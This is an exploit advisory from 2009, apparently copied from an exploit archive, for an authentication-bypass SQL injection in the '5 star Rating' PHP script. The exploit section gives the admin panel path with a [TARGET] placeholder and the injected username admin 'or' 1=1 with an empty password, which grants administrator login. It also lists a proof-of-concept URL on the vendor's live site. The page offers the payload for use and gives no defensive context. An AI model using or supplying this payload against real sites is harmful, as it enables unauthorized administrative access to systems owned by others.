[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : 5 star Rating 1.2 (Auth Bypass) SQL Injection Vulnerability
# Published : 2009-04-22
# Author : zer0day
# Previous Title : elkagroup Image Gallery 1.0 Arbitrary File Upload Vulnerability
# Next Title : WebPortal CMS 0.8b Multiple Remote/Local File Inclusion Vulnerabilities
@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@ @@@ @@@
@@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@@ @@@ @@@
@@! @@! @@! @@@ @@! @@@@ @@! @@@ @@! @@@ @@! !@@
!@! !@! !@! @!@ !@! @!@!@ !@! @!@ !@! @!@ !@! @!!
@!! @!!!:! @!@!!@! @!@ @! !@! @!@ !@! @!@!@!@! !@!@!
!!! !!!!!: !!@!@! !@!!! !!! !@! !!! !!!@!!!! @!!!
!!: !!: !!: :!! !!:! !!! !!: !!! !!: !!! !!:
:!: :!: :!: !:! :!: !:! :!: !:! :!: !:! :!:
:: :::: :: :::: :: ::: ::::::: :: :::: :: :: ::: ::
: :: : : : :: :: : : : : : : : :: : : : : : :
--[ Informations ]------------------------------------------------------
@author : zer0day (zer0day@vodkaorange.com)
@home : gotr00t.blogspot.com
@software : 5star_rating
@version : 1.0
@web site : http://www.maniacomputer.com/5star_rating/New_5Star.html
--[ Exploit ]-----------------------------------------------------------
---{{Authentification ByPass}}
Go to :
http://[TARGET]/5star_rating/admin/control_panel_sample.php
In username just enter : admin 'or' 1=1
and empty password
You are logged in Administrator !
Simply ?
--[ Proof Of Concept ]--------------------------------------------------
http://www.maniacomputer.com/5star_rating/admin/control_panel_sample.php
--[ End Of File ]-------------------------------------------------------
# www.Syue.com [2009-04-22]